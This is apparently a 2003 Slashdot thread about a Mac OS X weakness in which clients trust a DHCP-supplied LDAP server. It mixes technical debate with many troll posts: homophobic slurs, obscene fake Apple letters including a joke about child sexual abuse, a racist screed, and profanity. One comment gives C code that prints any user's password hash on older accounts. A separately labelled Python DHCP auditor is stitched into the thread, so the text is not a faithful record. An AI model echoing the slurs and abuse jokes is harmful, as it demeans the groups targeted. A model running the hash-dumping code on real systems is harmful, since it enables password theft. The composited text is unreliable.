Apple Responds to Exploit
Dave Schroeder writes, "This isn't so much of a root vulnerability as a default configuration that trusts the integrity of the local network services. This functionality has been around since NeXTSTEP, and is designed to allow for auto-configuration of new servers/machines brought into the network. The quick 'fix' for the vast majority of users who choose to implement it is to uncheck LDAPv3 and NetInfo altogether in Directory Access. Or, if LDAP services are used, just uncheck 'Use DHCP-supplied LDAP Server' in LDAPv3. ... One could argue that these features should be off by default, but if they are, it kind of wrecks the whole auto-configuration scheme." This sounds related to a great new feature in Mac OS X Server 10.3/Xserve called "automatic setup" that -- for machines that come with it preinstalled -- will get their address and LDAP server via DHCP and look for configuration files, and automatically configure the entire server, without any interaction beyond plugging it into the network and turning it on.
Take a bite of this, Apple!
Primary post! Will of warrior!
What? You are all guys filled with turkey birds?
Cognitive dissonance for the Mac cult?
Is nothing but an Apple apologist. Pretty sad that someone can be so suckered into something. Apple is OK, but they aren't perfect (no company is).
The domino effect is in place, and now that one backdoor is covered, I just read about a brand new one.
There goes Apple's "advantage" of supposedly being virus free.
The quick 'fix' for the vast majority of users who choose to implement it is to uncheck LDAPv3 and NetInfo altogether in Directory Access. Or, if LDAP services are used, just uncheck 'Use DHCP-supplied LDAP Server' in LDAPv3.
Yes that should be obvious to Mac users
It's a feature!
This
Please respond if you are a non-fudgepacker that own these overpriced, underpowered machines. I'd like to know if anyone with tight sphincters are macheads.
but it's as valid today as it ever was. There is a dichotomy between security and ease-of-use. Hitherto it has been impossible to have the one and the other simultaneously. Choose one.
Apple choose ease-of-use, and get criticised for leaving an open security "hole". Microsoft choose the same, and get criticised for (well, just about everything except wonderful marketing), and Linux chooses the other, and is criticised for poor ease-of-use.
That's not to say it's impossible, but it needs more than the current level of effort that goes into multi-node design. Apple is taking the first steps, and they've been somewhat burnt. Let's hope that doesn't discourage them from carrying on down the path... Unix as a genre can only learn from a successful easy-to-use and secure implementation of multi-machine computing. The thing is that you only learn by trying....
Simon.
Physicists get Hadrons!
Apple adds nothing, changes nothing, fixes nothing...
At the very least, it would be nice to have seen an update that automatically fixed this for the hundreds of thousands of users who are vulnerable and not reading random Apple tech notes.
Even if the bad guy has to be on your subnet, a vulnerability is a vulnerability and it would've been nice to see this taken a little more seriously. I know plenty of people running WEPless Airport at home, and this could be the method of attack from the front yard...
If nothing else, this seems like a potential method for a virus to be transmitted within a subnet from one trusted machine to another.
So c'mon Apple... how 'bout a little more of a response?
Realistically, an issue trusting the LDAP server that your DHCP server points you at?
What is the world coming to?
Do I need to manually verify every single setting supplied to me by my DHCP server because I don't trust it?
These days, the internet is not a safe place, we all need to be more than just a little paranoid - but are you paranoid enough?
Visit CryptoGnome in his home.
Thanks for your letter. Being Catholic myself, I know exactly what you're talking about! It has always been our plan here at Apple Computer Inc to revolutionize personal computing with our high-quality and highly gay products.
I'm happy to answer your letter by letting you know that YES we will be releasing an entire hLife ("homo-life") software line. You'll be able to recognize it in stores by the small stylized logo depicting a large cock entering a tight anus with an Apple logo on it. ("Suddenly it all comes together" indeed!).
Anyway, I hope you and other members of our community will join us on our mission, and purchase the exciting new hLife boxed set. Only the boxed set comes with translucent cock rings!
Sincerely,
Harry Rodman
Vice-president
Homosexual Liaison Services
Apple Computer, Inc.
It's about damn time they found an exploit for an Apple computer!
Goo goo g'joob.
No matter what sort of spin Apple puts on it, it's still retarded of them to trust LDAP to the point that UID=0 is trusted to be root.
Still, I don't think that this exploit is really that easy to take advantage of... the circumstances which would lead to it are fairly limited for now (until WiFi is as pervasive as air, anyway).
... Just realign the jefoerys tubes and reroute the power from the conduits!
This is horrible... First the machine comes with a pre-configured backdoor/exploit, and they want to leave it like this? Second, if you can just plug the machine into a network and have it totally configure itself, you've just killed a job for an IT guy... and we need all the jobs we can get...
;)
Oh, wait... once the new machine gets owned by some script kiddies, then the IT guy gets called... okay... phew... nearly thought that a job was eliminated... nevermind... as you were...
---
Programming is like sex... Make one mistake and support it the rest of your life.
I wonder what new bug is waiting in their "automatic setup" to bite us.
I was recently bit by their hijacking of the .local tld with their Rendezvous/mDNS crap.
(and when you call their support to ask why the Mac cannot see the local mail server called x.y.local, they have no idea and tell you to go around asking in web forums!)
So whatever they do and sell you as "making things easier", I would be very afraid to have it on my network.
Dear Apple:
I bought an Apple computer because of its native support for teledildonics. I bought a USB FUFME and MacOS immediately recognized it and installed drivers instantly! As a gay Catholic priest who often can't be at the altar all the time, you can understand how the ability to have sex with children whilst on the airplane with my Powerbook and wireless internet service is a lifesaver.
I just have a single question, will Apple be releasing a firewire version of the FUFME anytime soon?
With much gayness,
Father Michael "Arminass" Sims
This problem is rather simple... Operating systems such as Windows and MacOS X (don't troll me with Darwin) are commonly developed inside corporate environments, and a direct connection to the internet rather than a firewalled LAN is the exception, rather than the rule. When the pointy haired boss walks in and requests a machine that can set itself up when he plugs it into the network, it gets delivered.
I expect retail software geared to the home user will continue to keep the tendency of shipping flawed, because development often does not take place in a home environment. This goes for everything from Quake servers (remember ID's backdoor?) to all of the $40 photo-editing tools that are sold at Wal-Mart with marketing emphasis on the end user, with interfaces so all-encompassing, wizard-heavy, and dumbed-down that even I don't attempt to teach my low-tech friends how to use them.
apple should throw some of those boxes towards the debian sys admins and save them some time. god forbid one configures a new server on the internet
...it's about *how it's handled*.
All software is, and will continue to be for the foreseeable future, vulnerable. The question for the users and security people is, "How will company x handle themselves when a vulnerability is discovered in their product?"
This question, and its answer, is the most important issue when deciding who you trust with your data.
dmiessler.com -- grep understanding knowledge
and they will send a refurbished mac back to you.
All for the low, low price of $300. As a bonus you get a free iPod battery and a 50 page installation manual.
Just press the # key when you ring Apple support and tell them that Pudge sent you.
Dear Father Sims
Thank you for your kind letter! Being a former Catholic priest myself, I know exactly what you are talking about! It has been our dream at Apple Computers ever since we began in the 80's to shape the homosexual experience with the ultimate computer.
I can answer your letter by saying that YES we will indeed be making a firewire version of the FUFME. With the additional bandwidth offered by the firewire bus, we will be able to more accurately record and deliver more minute and subtle movements that the USB FUFME simply couldnt support due to lack of bandwidth. You will be able to recognize our firewire FUFME in stores by the fancy holographic logo of a cock entering an Apple.
We are glad to help loyal customers such as yourself. If you ever have any more questions, feel free to drop a line (or connect to my teledildonic FUFME server on fufme://cockman.apple.com).
Hugh G. Cockman
President
Homosexual Liaison Services
Apple Computer, Inc.
really, from apples docs, you have to have a malicious dhcp server on your subnet. of course, someone could bring a rogue box into work, but this isn't on par with ms exploits. wouldn't a simple mac address filter at the switch level take care of all this? yeah, you could install dhcpd on your authorized client, but this should also be a fairly easy thing to detect. i think apple is right, it's a configuration level solution.
My problem? I was perfectly gruntled, until some numbnuts came by and dissed me.
calling this an exploit is downright foolish. -j
Its an exploit by all means.
Its like calling a bug a "feature"
ALSO: WHAT THE FUCK is a 'jefoerys tube'?!?!??!?
In many discussions, people downplay the importance of exploits like these because the attacker has to be on your local network to take advantage of the security hole. What about all of the mis-configured (or deliberately) open wi-fi networks out there? I think that wireless networking has changed the importance of "local exploits" by allowing somebody passing by to become a local entity on an open wi-fi network.
Problems such as this show that any computer can be insecure. It's not just an Apple or M$ issue. Every system has weaknesses (even a *nix box) and the only way to guard against them is through vigilance and education. Learning of the exploits and fixing them. In my opinion the more knowledgeable the user (or Admin for networks) the more secure the system. 'Nuff said. Now we can get back to the usual M$ vs. Apple pissing contest that we all love.
I think I think, therefore I think I am.
This problem seems little worse than other problems related to DHCP. If someone had access to your subnet and was able to configure a rogue DHCP server (e.g. to exploit the OS X ldap bug) they could just as easily return a rogue proxy as the default gateway or a tainted DNS server. If you are not vigilant about SSH warning messages or best practices you could be connecting to a server which is just recording your password and passing it along to the real server.
There may be something I'm missing, but this does not seem to be a problem with Mac OS X as much as it is with DHCP. DHCP in its simplest form is not secure. Using DHCP on a subnet requires trust. As with any other kind of security you will have to trust something, whether it is your computer or your home network.
I hope people do not blow this bug out of proportion too much.
The more they overthink the plumbing, the easier it is to stop up the drain.
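Both the summary's point (the DHCP server hands the client an LDAP server to trust) and the post above (a rogue DHCP server can just as easily hand out a rogue gateway or DNS server) come down to looking at what a DHCP offer actually carries. The following is an added example, not code from the thread or from Apple: it parses the options field of a DHCP message and flags an unauthorized server identifier, router or DNS addresses outside an allowlist, and the presence of option 95 (registered with IANA as LDAP). The packets, addresses and allowlists are constructed test data.

```python
"""Audit a DHCP offer for settings a client would otherwise trust blindly.

Added example (not from the Slashdot thread or from Apple). The sample
packets and the allowlists below are constructed for illustration.
"""
from __future__ import annotations

from ipaddress import IPv4Address
from typing import Optional

DHCP_MAGIC = b"\x63\x82\x53\x63"          # magic cookie after the 236-byte BOOTP header
OPT_ROUTER, OPT_DNS, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_LDAP, OPT_END = 3, 6, 53, 54, 95, 255


def parse_dhcp_options(packet: bytes) -> dict[int, bytes]:
    """Return {option_code: raw_value} for a BOOTP/DHCP packet."""
    if len(packet) < 240 or packet[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP packet (missing magic cookie)")
    options: dict[int, bytes] = {}
    i = 240
    while i < len(packet):
        code = packet[i]
        if code == OPT_END:
            break
        if code == 0:                       # pad byte, no length field
            i += 1
            continue
        if i + 1 >= len(packet):
            raise ValueError("truncated option header")
        length = packet[i + 1]
        value = packet[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        # An option may be split across several TLVs; concatenate the pieces.
        options[code] = options.get(code, b"") + value
        i += 2 + length
    return options


def _addrs(raw: bytes) -> list[str]:
    """Decode a run of packed IPv4 addresses (trailing partial bytes ignored)."""
    return [str(IPv4Address(raw[k:k + 4])) for k in range(0, len(raw) - len(raw) % 4, 4)]


def audit_offer(packet: bytes, authorized_servers: set[str],
                expected_routers: set[str], expected_dns: set[str]) -> list[str]:
    """Return human-readable findings; an empty list means the offer matches expectations."""
    opts = parse_dhcp_options(packet)
    findings: list[str] = []
    server = _addrs(opts.get(OPT_SERVER_ID, b""))
    if not server or server[0] not in authorized_servers:
        who = server[0] if server else "missing"
        findings.append(f"server identifier {who} is not an authorized DHCP server")
    for a in _addrs(opts.get(OPT_ROUTER, b"")):
        if a not in expected_routers:
            findings.append(f"router option points to unexpected gateway {a}")
    for a in _addrs(opts.get(OPT_DNS, b"")):
        if a not in expected_dns:
            findings.append(f"DNS option points to unexpected resolver {a}")
    if OPT_LDAP in opts:
        # Option 95 is what tells a client which LDAP server to use; on a
        # network that never hands out LDAP via DHCP, its presence alone is a finding.
        findings.append("option 95 (LDAP) present: " + opts[OPT_LDAP].decode("ascii", "replace"))
    return findings


def build_offer(server: str, router: str, dns: str, ldap_url: Optional[str] = None) -> bytes:
    """Construct a minimal DHCPOFFER for testing (header fields zeroed except op/htype/hlen)."""
    header = bytes([2, 1, 6, 0]) + bytes(232)   # op=BOOTREPLY, htype=Ethernet, hlen=6, hops=0
    body = bytes([OPT_MSG_TYPE, 1, 2])          # message type 2 = DHCPOFFER
    body += bytes([OPT_SERVER_ID, 4]) + IPv4Address(server).packed
    body += bytes([OPT_ROUTER, 4]) + IPv4Address(router).packed
    body += bytes([OPT_DNS, 4]) + IPv4Address(dns).packed
    if ldap_url:
        data = ldap_url.encode()
        body += bytes([OPT_LDAP, len(data)]) + data
    return header + DHCP_MAGIC + body + bytes([OPT_END])


if __name__ == "__main__":
    # Constructed rogue offer: unknown server that also pushes an LDAP server.
    rogue = build_offer("192.0.2.99", "192.0.2.99", "192.0.2.99",
                        "ldap://192.0.2.99/dc=example,dc=org")
    for line in audit_offer(rogue, {"192.0.2.1"}, {"192.0.2.1"}, {"192.0.2.53"}):
        print(line)
```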
Muslim community leaders warn of backlash from tomorrow morning's terrorist attack.
A friend of my brother's recently found this one in OSX: Link to his blog entry about it
Not SO bad, but could be bad, and it's considerably more dangerous for known Unix nerds.
I don't mind this at all.
:-)
No professional I know connects a server to the network BEFORE they configure security and network settings.
Shame on you if you do
Shows that Unix is not the way to go.
FOAD
In this case, the software is actually more vulnerable in a work environment, because it requires a compromised DHCP server on the local subnet. Most home users would probably notice if you plugged in another computer in their house. It's less likely to be noticed in a corporate environment, at least for long enough to compromise a few servers.
Besides, if it's possible for someone to sneak a compromised DHCP server on your network, you're basically screwed anyway.
I warned you...
A professor at the University of Mississippi is giving a
lecture on the supernatural. To get a feel for his
audience, he asks: "How many people here believe in
ghostses?" About 90 students raise their hands.
"Well, that's a good start. Out of those of you who
believe in ghostses, do any of you think you've ever seen
a ghostse?" About 40 students raise their hands.
"That's really good. Has anyone here ever talked to a
ghostse?" 15 students raise their hands.
"That's great. Has anyone here ever touched a ghostse?" 3
students raise their hands.
"That's fantastic. But let me ask you one question
further... Have any of you ever made love to a ghostse?"
One student way in the back raises his hand.
The professor is astonished and says, "Son, in all the
years I've been giving this lecture, no one has ever
claimed to have slept with a ghostse. You've got to come
up here and tell us about your experience."
The redneck student replies with a nod and a grin, and
begins to make his way up to the podium. The professor
says, "Well, tell us what it's like to have sex with a
ghostse."
The student replies, "Ghostse?!? From ah-way back there ah
thought yuh said "goatse."
--
Mamma look!
But WILL correct your spelling. Jefferies tubes. Looking at a trek encyclopedia right now.
I just tested it. It is real.
Maybe we deserve this world ?
The server configuration feature is similar, but it isn't directly related to the DHCP security issue. The server configuration is specifically for cluster-type configurations where you want a server to boot up with a basic configuration automatically. You can also load the configuration from a file via a USB keychain or even an iPod. It's just a small XML file with all the configuration info.
Theoretically a hacker could exploit this as a "security" hole, but they would need to set up a local LDAP server to give out the configuration, and they would need to reboot the Xserves. They could just as easily go up to the Xserve and reload the OS from CD.
- "When you want something with all your heart, the entire universe conspires to give it to you" -Paulo Coelho
You are the biggest loser I have ever encountered. Your use of acronyms is retarded. Go get a life instead of subjecting us to your foolish troll-wit. Fuck off.
.... turns out, if someone had RTFM, nobody would be talking about this.
This sounds related to a great new feature in Mac OS X Server 10.3/Xserve called "automatic setup" that -- for machines that come with it preinstalled -- will get their address and LDAP server via DHCP and look for configuration files, and automatically configure the entire server, without any interaction beyond plugging it into the network and turning it on.
Slashdotter A: "Are we being sarcastic?"
Slashdotter B: "I can't even tell anymore."
...so that he could lift your wallet.
Jesus was black.
White people shipped black African people to the USA on boats in locks and chains and made them slaves.
The white man owns all the businesses and continues to discriminate against blacks keeping us as slaves. Whites will never give blacks important jobs or security.
The whites are against affirmative action cause they are scared that the black man will get his equal share.
The black man must take power from the whites so we they can no longer throw us in prison. White cops are known for racial profiling and beatings of blacks.
White crackers are so dumb that they can not jump or slam dunk a basketball.
Honkeys have no rhythm and are unable to dance.
White girls prefer black men over white men but are kept away by white condemnation.
Whites take it out on successful people in our community and have arrested brothas & sistas including OJ Simpson, Mike Tyson, Rosa Parks, Puff Daddy, Snoop Dog, Jessie Jackson and Al Sharpton.
Our group will fight to rid people like Mark Furman, Trent Lott, David Duke, all the NYC cops who beat up Rodney King, Abner Louima and many others.
Our goals include:
-Slavery reparations.
-Affirmative action and equal housing opportunities.
-Higher earned income & child credit for African Americans.
-Send African Americans to school and not prison.
-A black police force.
-Black schools which the government should pay for.
Interested in helping us achieve our goals?
Want to join our group? You can e-mail our group's president Brian Keffer.
Email:
bkeffer@thecommandline.org
from the dictionary --
One who is zealous; one who engages warmly in any cause, and pursues his object with earnestness and ardor.
Doesn't sound so bad to me. Are you a Linux zealot? A Windows zealot? Does having a strong opinion make you a zealot? Or are you opinionless.
You are the lemming. Spewing the same tired crap about 'Mac zealots'.
Shut up, Anti-Mac zealot.
This is a public service announcement. Adrian has incredibly baggy pants. Really - they're like tents!
"'I pass the test,' she said. 'I will diminish, and go into the West, and remain Galadriel.'"
- JRR Tolkien.
That's like saying "We have dozens of crimes in those countries that allow more freedoms than us"
Apple = Dictators.
Apple Users = Sheep.
Apple Zealot = Particularly angry sheep.
Windows = Freedom
Microsoft = USA
God Bless America.
This isn't so much of a root vulnerability as a default configuration that trusts the integrity of the local network services.
That is a root vulnerability. You could perhaps trust LANs 20 years ago, you absolutely cannot trust them today, and any vendor that ships software that, by default, trusts the LAN is shipping software with severe security problems.
Grow up you twelve year old...I knew what those tired acronyms meant when you were begging your parents for lunch money...
YOU HAVE BEEN TROLLED -- YOU HAVE LOST -- HAVE A NICE DAY -- FUCK OFF AND DIE you loser...
P.S. I DO own a Mac. I AM more successful than you'll ever be thanks to it. I NEVER crow about either of those facts except when some snot-nosed slashdot/linux wannabe tries to make something of it. Go back to pretending that you have some stake in Linux and that you are fighting some sort of 'good fight' -- bottom line is, I know you are a fake, you know you are a fake -- no one who actually contributes to something as marvelous as Linux/open-source would be as rude/crass/intolerant as you -- I know you haven't been around these parts as long as I have, and you now know that YOU HAVE LOST...NEEEEEEEEEXT
When you think about it, there are literally hundreds of Macs out there, many of which are connected to the Internet. Obviously this could cause a huge problem.
Then professionals wouldn't mind manually typing in the LDAP server address, which means this entire feature is worthless.
Hmm, as long as they don't have to right-click anything, I guess they should be able to handle it.
not that there's anything wrong with that.
1. Don't use .local for your subdomain /etc/named/ (which effectively disables a large chunk of Rendezvous)
2. Disable Rendezvous' broadcast-based resolver by hacking on the stuff in
Despite their preference for using Macintoshes, they're for the most part regular people just like you and me. People really need to learn some tolerance for people that are different.
Mod me down if you must, but if we don't learn to live together harmoniously it's just going to cause more suffering in the future. And I don't want to hear any stupid comments like, "Well, they should just switch to PC's" because it's not a choice that they make. They're just born that way.
Glad I got that off my chest.
This doesn't sound much different from MS's way of leaving most services turned on and wide open by default.
It seems like Apple's public image prevents them from publishing more information about possible exploits. If it doesn't fit with the image of "easy-to-use!", they leave it up to someone else to publicize. It's a great idea to have automatically-configured machines, but these things need to be well-known. As is so often the case, education is the most important part of the equation.
Now I'll have to search my home every morning when I wake up, to make sure nobody's broken in and placed a rogue machine providing DHCP and LDAP services on my LAN.
Wake me when there's a real Mac OS X exploit that's as bothersome as say, Blaster.
Speaking of Windows vulnerabilities, seven more were discovered recently in Internet Explorer. Is the total number of IE security holes up to four digits yet? We must be getting close.
Security and convenience do not mix. Apple is basically saying that their OS will continue to be insecure by default so users can enjoy convenience. PC's have a similar vulnerability, well ones that try to netboot by default. A rogue PXE server could feed a backdoored kernel to netbooting clients that mounts and runs the default root partition. Users, unless they pay attention to what their PC just booted off of, won't know anything is wrong. Netbooting is another convenience issue, who can argue with media-less booting!
Except these boxes are not for professionals.
Before anyone says "macinista", I've been using computers all day every day for 25 years now (since i was eight or so), and was a commodore man if you must know. I only got my first mac about two years ago. However, I will no longer have anything but a mac in my house because MacOS X based macs do everything I need - including a high quality X server - and never, ever, break. I'm a Solaris admin all day for a very large company. I don't want to hassle with munged computers at home. I prefer to farm.
"He who would learn astronomy, and other recondite arts, let him go elsewhere. " -- John Calvin, commenting on Genesis 1
Anyone who manages to get a directory server on their network better be a professional.
-- will get their address and LDAP server via DHCP and look for configuration files, and automatically configure the entire server, without any interaction beyond plugging it into the network and turning it on.
Reminds me of a user who left the Windows 2000 Professional CD-ROM in his CD-ROM drive, booted from it, and reinstalled Windows. Though, he did have to "answer a few questions" (i.e. Press R to reinstall Windows).
I'd say it's one more nail in Microsoft's coffin. Apple once again comes through with a sleek and efficient design. The process to accidentally reinstall the OS is completely automated!
I was browsing a local windows network I set up the other day and saw a shared folder that was NOT previously made shareable. It seems one of the new Windows patches re-enables the "shared documents" folder on the network, and in explorer it's misleading because it doesn't use the standard "hand-looking" shared folder icon. I am really sick of this intentional and misleading crap by Microsoft! Apple should set a higher standard in this area by making sure everything is straightforward and on high security by default.
Unless I'm mistaken, I read that Google uses a similar autoconfiguration for servers. They buy the server, plug it in, turn it on, and the rest is all automatic. I'm pretty sure they use a Linux distro, but it'd be cool for big institutions if OS X could have this functionality.
Sorry to release this 'sploit "into the wild" without warning Microsoft, but I figured it was important to warn Win9x system admins ASAP. I also thought that Microsoft has had plenty of time to find/fix this major flaw --it is 2003...
In light of the recent Debian break in, where the core servers were rooted and a rootkit installed on other machines, and all this using ldap for user authentication, I think Apple is making a huge mistake. All it needs is a couple of apple machines to be rooted by an exploit based on this and Apple will be in the same sorry boat that MS is in.
(And for the zealots, I'm posting this from a G4 PB so STFU thanks.)
Ah ahem, several storage servers like Snap and etc also come with this 'feature'..
and those run Linux...
Don't Tread on OpenSource
[o]_O
It seems to me you proved his point.
... hmmm, Hasn't found anything that works well on a PC. Um maybe he hasn't looked in the past ... 10 years.
Your father used macs when they were good. Kept on using them when they weren't good because he didn't investigate anything else (can anyone say blind Zealot?)
The artist uses a mac
You see the reason everyone calls mac users stupid is that they always assert that macs are always better. Even when they obviously aren't. So nobody believes them when they are faster. PC's change on such a quicker timescale that anything that is better on a mac is only better for a couple of months before it gets trumped. And it stays worse for another 3 years before Apple comes out with some thing new.
Or at least fair compensation, for gods' sake!!!
Since this is an autoconfiguration feature, why not have it on only for the first boot after installing the OS? This way the computer can autoconfigure and then when it is configured it turns the feature off again.
The interactive way to Go -- http://www.playgo.to/iwtg/en/
The messenger service is used by many organizations for alerts. Where I work, our servers use it to send alerts to those that manage them. Works well since, unlike e-mail, it will get immediate attention. A web browser that is able to execute scripts is much more complex and therefore vulnerable than one that just doesn't execute code at all.
Get off it, when you provide services to the world, you open yourself to the possibility of getting hacked. Look at Linux. Consider the holes in OpenSSH. Is it essential? No. Is it useful? Hell yes. When you run services that the whole world can get at, you run the risk that there is a flaw in the coding that someone exploits.
Now, a valid solution to this is to have everything turned off and/or locked down by default. Ok, that works, but is a pain in the ass (read not easy to use) since you must then figure out how to enable everything and make it work. IF you have useful services enabled by default, it runs the risk they are vulnerable and can be exploited by default.
By the way, if you have to reinstall Windows continually, you need to get some skills with Windows. To fuck it up that often and that bad indicates poor skills of the user.
We had to track down and have arrested a haxs0r that was spoofing our router in an attempt to capture passwords. He could have also easily done this with a DHCP server (well, had he been intelligent enough to make his software work). When you run a network that offers some kind of public access, and there are a great many, you run the risk of infiltration. Plus, do you trust ALL your employees?
Security is not simple, and the balance between security and usability is even more complex.
I always wondered why there wasn't a sandbox approach to this automatic networking stuff... something to the tune of:
Plug new PC in, a daemon listens/pings for DHCP, LDAP, whatever... and if it finds it, politely asks the user if he/she would like to enable the service. If you have admin privileges you get to authenticate and proceed to register with the service or if in an untrustworthy environment you can choose to leave them disabled. If a new server is found at any time the process is repeated... though you could set a preference to ignore new servers as well.
See, sandbox. Requests are let in automatically but service must be opted into manually.
A fool throws a stone into a well and a thousand sages can not remove it.
Before misleadingly filling your comment with "IETF", maybe you should read a few IETF documents and join their working groups yourself.
And Apple IS hijacking the .local tld, and not only did the IETF never recommend that it be reserved for Apple's Rendezvous, but in fact had "concerns about multicast storms resulting from site-wide mDNS usage, as well as concerns about cache pollution" (among others).
I will gladly admit that mDNS doesn't have to be crap in itself, and may be cool, but Apple's proposed implementation is NOT going through the IETF standards process.
What they eventually adopted in the standards track is LLMNR.
LLMNR also doesn't require suddenly taking over a widely used tld.
Also: "Rendezvous is an individual submission that is not a work item of any IETF working group, and is currently not an IETF standard. While it is possible for an individual submission to become an IETF standard, this is unlikely in this case because an existing WG (DNSEXT) is already working on a competing protocol (LLMNR), which has just completed DNSEXT WG last call."
See the LLMNR FAQ.
Anyone know how to make a Mac work as a DHCP client in the first place??
We plugged one into our network, just wanting to use the web browser, and spent several hours wandering round all the network configuration dialogs we could find. We could find nothing at all that would persuade the Mac to actually go and ask the DHCP server for an IP address. (So we junked it and carried on just using real computers.)
However, looking at the documents themselves (draft-ietf-dnsext-mdns-24.txt and draft-cheshire-dnsext-multicastdns.txt), it's not immediately obvious which one is farther along. They are both Internet-Drafts in the "standards track" category. I didn't realize that Microsoft's protocol was a work item of DNSEXT while Apple's was not.
main(c,r){for(r=32;r;) printf(++c>31?c=!r--,"\n":c<r?" ":~c&r?" `":" #");}
So Osama's not only against the American Way of Life, democracy, human rights and bikinis but also hates the Clintons? WOOT, Hillary for President! =)
Don't think of it as a flame---it's more like an argument that does 3d6 fire damage
Apple's got a ways to go before they're really on the ball with security. I generally run their security update feature every day; I just got the patches for OpenSSL and zlib a week ago. Also, there's a bug filed in OpenDarwin that works in Jaguar and, I'm disappointed to see, also works in Panther.
Run this as any user with an argument of any other user's username. Pay careful attention to the second field.

#include <stdio.h>
#include <pwd.h>

/* Prints the passwd record for the named user in master.passwd field order.
 * The second field is the password hash; for a 10.2-style account it is the
 * crypt(3) hash itself, readable by any local user. pw_class, pw_change and
 * pw_expire are BSD fields that exist on Darwin. */
int main(int argc, char **argv)
{
    struct passwd *p;
    if (argc != 2 || (p = getpwnam(argv[1])) == NULL) {
        fprintf(stderr, "usage: %s <existing username>\n", argv[0]);
        return 1;
    }
    printf("%s:%s:%d:%d:%s:%ld:%ld:%s:%s:%s\n",
           p->pw_name, p->pw_passwd, (int)p->pw_uid, (int)p->pw_gid,
           p->pw_class, (long)p->pw_change, (long)p->pw_expire,
           p->pw_gecos, p->pw_dir, p->pw_shell);
    return 0;
}
Don't bitch at me about publishing this. It's already available in the OpenDarwin bug list.
www.sitetronics.com/wordpress
The 10.3.1 patch corrects this flaw, but there is still no patch available for 10.2. This flaw was mentioned a month ago on various Mac websites, I should have done my homework.
Maybe we deserve this world?
All those asterisks must imply that the user's password is a swear word which has been censored!
When I ran the directory access utility, LDAPv3, NetInfo, Rendezvous, SLP, and SMB were all turned on. My question is, do I need any of them running? I am on a stand-alone computer on a DHCP-enabled cable modem.
The guy's anecdote is wrong? His father wasn't successful during those 'dark middle ages' when his Mac 'wasn't good'? His artist friend should arbitrarily change platforms to 'save' a couple hundred bucks (money lost after purchasing new software)?
I don't want anyone to switch to Macs -- trust me. Apple will be around a long, long time. They do not need to be the most ubiquitous platform -- If I never bought another computer, I could be happy with my last Apple laptop and my present software collection for a few decades - if not forever. Sure I'll fall behind the 'gaming world' somewhere around 'Doom 6' but I never said I wouldn't buy a new console...
We apologise for the fault in this post. Those responsible have been sacked. -- Signed RICHARD M. NIXON
I know this might be a newsflash for all you homophobic teen-geeks out there, but some of us actually WORK on our computers. There is this thing called a paycheck -- kinda like your 'allowance' only you don't get it handed to you from Daddy for having been shat out of your Mommy's box...
And the size of that 'paycheck' while never a direct indicator of success, can be objectively used to infer the relative merit of the tools at hand. I use a Mac. I make money using a Mac. I am sure I could make money using Windows, but why? So I can play some games while I'm not working? I leave that to you guys in the dorms...
Go suck Bill Gates' cock you weasel-loving uncle fucker.
Calling the autoconfig "feature" a root exploit is no different than calling the Win9x login one either.
Here's another exploit you can ignorantly mod down: The telnet protocol is unencrypted!! The entire telnet session, including usernames and passwords can be sniffed.
HA. That post should be moderated +10 Side-splittingly hilarious
if you could spell. So much for 'educated opinions' from PC users. You make me laugh.
If you have a user account that was present in 10.2, it stays as it was in 10.2 - i.e. the password is world readable and limited to 8 significant characters. If you make a new account in 10.3 or even change the password of an existing account that was brought over from 10.2 to 10.3, then the new password handling will take effect: shadow passwords and a larger number (I don't recall how many) of significant characters.
What is not fully documented is that if you have multiple network locations, you have to deselect this checkbox for each location. Fortunately, this is straightforward since there is a network location pull down menu right above the checkbox.
Note that this means you can leave it checked for trusted networks but uncheck it for untrusted networks.
Bitch at MS for suggesting a non-standard .tld for private domains.
Yes, I discovered yesterday that MS suggests .local for SBS. Why not? It's a perfectly natural choice for an internal domain. That's why I had chosen it many years ago, like many other netadmins. If MS does the same I have no objection. It is perfectly valid and doesn't break anything.
There is nothing "non-standard" in using .local as a local tld, and it is widely used.
I do like bitching at MS, but this is not a good occasion.
The way Apple uses it does break valid existing TCP/IP functionality.
Apple's simply following the Zeroconf RFC, which specifies .local.
I can also write an RFC, not listen to the objections, and follow my own RFC whatever the consequences. It wouldn't make my RFC a valid Internet standard.
This could have been just a little glitch in OS X. But the way they treated it, they appear to be just as arrogant as MS.
They always said that you would never be anything.
Everything you tried to do was just a waste of time.
But you believed you could do any sex you wanted to.
You made your mind up and you came from behind.
Don't let them try to tell you what computer to buy
Don't let them hold you back, don't ever change your mind.
Homosexuality - Be proud of what you are
Homosexuality - Don't let them cut you down
You can buy whatever comp you want to buy,
But don't change from Apple for society.
Don't lose your Homosexuality.
The years go by, you find that pudge cums easily.
And the world is full of people tryin' to rape your ass.
Don't ever turn your back on anything you've ever been.
You don't need to prove yourself to anybody else.
Don't let them try to tell you what computer to buy
Don't let them hold you back, don't ever change your mind.
Homosexuality - Be proud of what you are
Homosexuality - Don't let them cut you down
You can buy whatever comp you want to buy,
But don't change from Apple for society.
Don't lose your Homosexuality.
There's no room for second best, no second chance, don't fail the test,
Gotta rise above the rest, gotta try to make your mark.
You don't need to be so vain, no need to act so proud,
Follow the trendies, don't ever stand out from the Apple crowd.
Do you really care what other people want to do to you?
Does it really matter what they do or if they're gay?
You've fucked too hard to let them cum all back in your face.
When their Apples never mattered anyway.
Don't let them try to tell you what computer to buy
Don't let them hold you back, don't ever change your mind.
Homosexuality - Be proud of what you are
Homosexuality - Don't let them cut you down
You can buy whatever comp you want to buy,
But don't change from Apple for society.
Don't lose your Homosexuality.
Don't lose your Homosexuality.
Don't lose your Homosexuality.
..for vulnerabilities. "We're just trying to do it FOR you".
Joe
"Artificial Intelligence usually beats real stupidity."
Because of problems when switching locations.
As noted in Apple's article 25442:
This document discusses how to resolve an issue in which applications may sometimes take longer than expected to open (they "bounce" on the Dock for longer than expected) after changing locations or networks (including wireless networks).
Solution
Note: You should not use this solution if you rely on NetInfo services. If you are unsure, contact your network administrator.
1. Open Directory Access (/Applications/Utilities).
2. Authenticate if necessary.
3. Deselect NetInfo.
4. Click Apply.
and if netinfo is causing problems, why not uncheck everything else you don't need, including LDAP.
The whole point of network account management is to easily allow the network administrators to have administrative rights on the machines on their network.
/me wonders about Kerberos and DNS SRV records ...
Most any LDAP authentication setup on a unix system will allow a uid=0 user defined only in LDAP to log in (and essentially be root). That's the whole point.
The problem that needs to be solved is making this both secure (preventing rogue DHCP/LDAP servers causing exploits) yet easy to set up.
